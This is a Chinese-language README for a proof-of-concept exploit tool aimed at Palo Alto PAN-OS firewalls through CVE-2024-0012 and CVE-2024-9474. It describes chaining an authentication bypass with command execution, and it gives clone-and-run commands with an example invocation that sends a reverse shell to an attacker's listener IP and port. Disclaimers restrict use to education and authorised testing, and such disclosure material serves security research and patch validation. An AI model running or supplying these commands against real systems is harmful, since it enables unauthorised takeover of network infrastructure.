此概念验证(PoC)脚本针对 Palo Alto PAN-OS 中的漏洞,具体为 CVE-2024-0012 和 CVE-2024-9474,通过自动化利用过程,包括身份验证绕过、载荷生成、分块传输和无缝命令执行。
⚠️ 此脚本仅用于教育和授权的渗透测试目的。未经授权使用是非法的。
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>:目标 URL,包含 http 或 https。<LISTENER_IP>:你的反向 Shell 监听器 IP 地址。<LISTENER_PORT>:反向 Shell 监听器的端口。python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
从这篇 Medium 文章 获取此 PoC 的完整详解和技术分析!
此 PoC 仅用于教育目的和授权安全测试。严禁未经授权使用此工具。作者不对因使用此工具而造成的任何滥用或损害负责。